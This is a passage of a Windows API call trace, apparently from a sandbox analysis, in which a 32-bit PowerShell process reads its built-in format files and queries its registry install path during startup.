	[0158.311] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xceb38 | out: lpFileInformation=0xceb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0158.311] GetLastError () returned 0xcb
	[0158.311] SetErrorMode (uMode=0x1) returned 0x1
	[0158.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0158.311] GetLastError () returned 0xcb
	[0158.311] SetErrorMode (uMode=0x1) returned 0x1
	[0158.311] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xceb38 | out: lpFileInformation=0xceb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0158.311] GetLastError () returned 0xcb
	[0158.311] SetErrorMode (uMode=0x1) returned 0x1
	[0158.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0158.311] GetLastError () returned 0xcb
	[0158.311] SetErrorMode (uMode=0x1) returned 0x1
	[0158.311] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xceb38 | out: lpFileInformation=0xceb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0c3fbd, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0c3fbd, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2eaa6bc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0158.311] GetLastError () returned 0xcb
	[0158.311] SetErrorMode (uMode=0x1) returned 0x1
	[0158.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0158.311] GetLastError () returned 0xcb
	[0158.311] SetErrorMode (uMode=0x1) returned 0x1
	[0158.312] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xceb38 | out: lpFileInformation=0xceb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0158.312] GetLastError () returned 0xcb
	[0158.312] SetErrorMode (uMode=0x1) returned 0x1
	[0158.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0158.312] GetLastError () returned 0xcb
	[0158.312] SetErrorMode (uMode=0x1) returned 0x1
	[0158.312] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xceb38 | out: lpFileInformation=0xceb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a182698, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a182698, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd368cf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0158.312] GetLastError () returned 0xcb
	[0158.312] SetErrorMode (uMode=0x1) returned 0x1
	[0158.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0158.312] GetLastError () returned 0xcb
	[0158.312] SetErrorMode (uMode=0x1) returned 0x1
	[0158.312] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xceb38 | out: lpFileInformation=0xceb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0158.312] GetLastError () returned 0xcb
	[0158.312] SetErrorMode (uMode=0x1) returned 0x1
	[0158.312] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce6b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0158.313] GetLastError () returned 0xcb
	[0158.313] SetErrorMode (uMode=0x1) returned 0x1
	[0158.313] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xceb38 | out: lpFileInformation=0xceb38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0158.313] GetLastError () returned 0xcb
	[0158.313] SetErrorMode (uMode=0x1) returned 0x1
	[0158.314] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.314] GetLastError () returned 0xcb
	[0158.589] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.589] GetLastError () returned 0xcb
	[0158.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.590] GetLastError () returned 0xcb
	[0158.592] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x337c48, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0158.593] GetLastError () returned 0xcb
	[0158.593] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xce44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0158.593] GetLastError () returned 0xcb
	[0158.593] SetErrorMode (uMode=0x1) returned 0x1
	[0158.593] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0158.594] GetLastError () returned 0x0
	[0158.594] GetFileType (hFile=0x324) returned 0x1
	[0158.594] SetErrorMode (uMode=0x1) returned 0x1
	[0158.594] GetFileType (hFile=0x324) returned 0x1
	[0158.594] ReadFile (in: hFile=0x324, lpBuffer=0x2e7e5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2e7e5ec*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0158.991] GetLastError () returned 0x0
	[0158.991] ReadFile (in: hFile=0x324, lpBuffer=0x2e7e5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2e7e5ec*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0158.991] GetLastError () returned 0x0
	[0158.992] ReadFile (in: hFile=0x324, lpBuffer=0x2e7e5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2e7e5ec*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0158.992] GetLastError () returned 0x0
	[0158.992] ReadFile (in: hFile=0x324, lpBuffer=0x2e7e5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2e7e5ec*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0158.992] GetLastError () returned 0x0
	[0158.992] ReadFile (in: hFile=0x324, lpBuffer=0x2e7e5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2e7e5ec*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0158.992] GetLastError () returned 0x0
	[0158.992] ReadFile (in: hFile=0x324, lpBuffer=0x2e7e5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2e7e5ec*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0158.992] GetLastError () returned 0x0
	[0158.992] ReadFile (in: hFile=0x324, lpBuffer=0x2e7e5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2e7e5ec*, lpNumberOfBytesRead=0xce9b4*=0x9e2, lpOverlapped=0x0) returned 1
	[0158.993] GetLastError () returned 0x0
	[0158.993] ReadFile (in: hFile=0x324, lpBuffer=0x2e7db6e, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2e7db6e*, lpNumberOfBytesRead=0xce9b4*=0x0, lpOverlapped=0x0) returned 1
	[0158.993] GetLastError () returned 0x0
	[0158.993] ReadFile (in: hFile=0x324, lpBuffer=0x2e7e5ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2e7e5ec*, lpNumberOfBytesRead=0xce9b4*=0x0, lpOverlapped=0x0) returned 1
	[0158.993] GetLastError () returned 0x0
	[0158.993] CloseHandle (hObject=0x324) returned 1
	[0159.001] GetLastError () returned 0x0
	[0159.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xce514, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.002] GetLastError () returned 0x0
	[0159.002] SetErrorMode (uMode=0x1) returned 0x1
	[0159.003] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2e8f6a8 | out: lpFileInformation=0x2e8f6a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a02ba41, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a02ba41, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e5e3fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0159.003] GetLastError () returned 0x0
	[0159.003] SetErrorMode (uMode=0x1) returned 0x1
	[0159.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xce4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.003] GetLastError () returned 0x0
	[0159.007] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce938 | out: phkResult=0xce938*=0x324) returned 0x0
	[0159.008] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce980, lpData=0x0, lpcbData=0xce97c*=0x0 | out: lpType=0xce980*=0x1, lpData=0x0, lpcbData=0xce97c*=0x56) returned 0x0
	[0159.011] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce980, lpData=0x337c48, lpcbData=0xce97c*=0x56 | out: lpType=0xce980*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce97c*=0x56) returned 0x0
	[0159.013] RegCloseKey (hKey=0x324) returned 0x0
	[0159.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xce4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.014] GetLastError () returned 0x0
	[0159.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xce474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.014] GetLastError () returned 0x0
	[0159.055] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x9a714e4c, Data2=0x6cf1, Data3=0x455f, Data4=([0]=0x96, [1]=0x78, [2]=0x37, [3]=0xf4, [4]=0xe7, [5]=0xc6, [6]=0x25, [7]=0xe5))) returned 0x0
	[0159.138] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x2a8ce298, Data2=0xce9c, Data3=0x46c0, Data4=([0]=0x9a, [1]=0x14, [2]=0xc4, [3]=0xb7, [4]=0x41, [5]=0xeb, [6]=0x4d, [7]=0xc9))) returned 0x0
	[0159.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0159.147] GetLastError () returned 0x0
	[0159.147] SetErrorMode (uMode=0x1) returned 0x1
	[0159.147] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0159.147] GetLastError () returned 0x0
	[0159.147] GetFileType (hFile=0x324) returned 0x1
	[0159.147] SetErrorMode (uMode=0x1) returned 0x1
	[0159.147] GetFileType (hFile=0x324) returned 0x1
	[0159.148] ReadFile (in: hFile=0x324, lpBuffer=0x2ea2990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ea2990*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0159.148] GetLastError () returned 0x0
	[0159.148] ReadFile (in: hFile=0x324, lpBuffer=0x2ea2990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ea2990*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0159.148] GetLastError () returned 0x0
	[0159.149] ReadFile (in: hFile=0x324, lpBuffer=0x2ea2990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ea2990*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0159.149] GetLastError () returned 0x0
	[0159.150] ReadFile (in: hFile=0x324, lpBuffer=0x2ea2990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ea2990*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0159.150] GetLastError () returned 0x0
	[0159.150] ReadFile (in: hFile=0x324, lpBuffer=0x2ea2990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ea2990*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0159.150] GetLastError () returned 0x0
	[0159.151] ReadFile (in: hFile=0x324, lpBuffer=0x2ea2990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ea2990*, lpNumberOfBytesRead=0xce9b4*=0xfb2, lpOverlapped=0x0) returned 1
	[0159.151] GetLastError () returned 0x0
	[0159.151] ReadFile (in: hFile=0x324, lpBuffer=0x2ea20e2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ea20e2*, lpNumberOfBytesRead=0xce9b4*=0x0, lpOverlapped=0x0) returned 1
	[0159.151] GetLastError () returned 0x0
	[0159.151] ReadFile (in: hFile=0x324, lpBuffer=0x2ea2990, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ea2990*, lpNumberOfBytesRead=0xce9b4*=0x0, lpOverlapped=0x0) returned 1
	[0159.151] GetLastError () returned 0x0
	[0159.151] CloseHandle (hObject=0x324) returned 1
	[0159.151] GetLastError () returned 0x0
	[0159.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce514, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0159.151] GetLastError () returned 0x0
	[0159.151] SetErrorMode (uMode=0x1) returned 0x1
	[0159.152] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2ec3220 | out: lpFileInformation=0x2ec3220*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0159.152] GetLastError () returned 0x0
	[0159.152] SetErrorMode (uMode=0x1) returned 0x1
	[0159.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0159.152] GetLastError () returned 0x0
	[0159.152] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce938 | out: phkResult=0xce938*=0x324) returned 0x0
	[0159.152] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce980, lpData=0x0, lpcbData=0xce97c*=0x0 | out: lpType=0xce980*=0x1, lpData=0x0, lpcbData=0xce97c*=0x56) returned 0x0
	[0159.152] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce980, lpData=0x337c48, lpcbData=0xce97c*=0x56 | out: lpType=0xce980*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce97c*=0x56) returned 0x0
	[0159.152] RegCloseKey (hKey=0x324) returned 0x0
	[0159.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0159.153] GetLastError () returned 0x0
	[0159.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0159.153] GetLastError () returned 0x0
	[0159.154] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x74c33edb, Data2=0xb2d0, Data3=0x41e3, Data4=([0]=0xb4, [1]=0x3b, [2]=0x87, [3]=0x48, [4]=0x71, [5]=0x24, [6]=0x3e, [7]=0x6a))) returned 0x0
	[0159.164] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x8c4115e4, Data2=0xe701, Data3=0x4624, Data4=([0]=0xa4, [1]=0x9e, [2]=0xaa, [3]=0xfe, [4]=0x5e, [5]=0xae, [6]=0x8a, [7]=0xaf))) returned 0x0
	[0159.166] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0xee4a7904, Data2=0x1138, Data3=0x4e08, Data4=([0]=0xab, [1]=0xa8, [2]=0xe3, [3]=0x19, [4]=0x11, [5]=0x9d, [6]=0x18, [7]=0x58))) returned 0x0
	[0159.166] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x8e8b4bc4, Data2=0x4331, Data3=0x499a, Data4=([0]=0xb5, [1]=0xc2, [2]=0x7f, [3]=0xe2, [4]=0x8f, [5]=0xe6, [6]=0x6f, [7]=0xe8))) returned 0x0
	[0159.167] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x40ae69ea, Data2=0x35cb, Data3=0x48af, Data4=([0]=0xb9, [1]=0x9e, [2]=0x91, [3]=0xfd, [4]=0x43, [5]=0x67, [6]=0xd2, [7]=0x15))) returned 0x0
	[0159.167] CoCreateGuid (in: pguid=0xce9a8 | out: pguid=0xce9a8*(Data1=0x4ddc5e37, Data2=0x3e75, Data3=0x4424, Data4=([0]=0xb4, [1]=0x92, [2]=0xc4, [3]=0xd, [4]=0x8, [5]=0x27, [6]=0x95, [7]=0xcf))) returned 0x0
	[0159.167] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xce44c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0159.167] GetLastError () returned 0x0
	[0159.167] SetErrorMode (uMode=0x1) returned 0x1
	[0159.167] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0159.182] GetLastError () returned 0x0
	[0159.182] GetFileType (hFile=0x324) returned 0x1
	[0159.182] SetErrorMode (uMode=0x1) returned 0x1
	[0159.182] GetFileType (hFile=0x324) returned 0x1
	[0159.182] ReadFile (in: hFile=0x324, lpBuffer=0x2ee2bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ee2bc8*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0159.510] GetLastError () returned 0x0
	[0159.511] ReadFile (in: hFile=0x324, lpBuffer=0x2ee2bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ee2bc8*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0159.519] GetLastError () returned 0x0
	[0159.533] ReadFile (in: hFile=0x324, lpBuffer=0x2ee2bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ee2bc8*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0159.534] GetLastError () returned 0x0
	[0159.534] ReadFile (in: hFile=0x324, lpBuffer=0x2ee2bc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xce9b4, lpOverlapped=0x0 | out: lpBuffer=0x2ee2bc8*, lpNumberOfBytesRead=0xce9b4*=0x1000, lpOverlapped=0x0) returned 1
	[0159.534] GetLastError () returned 0x0
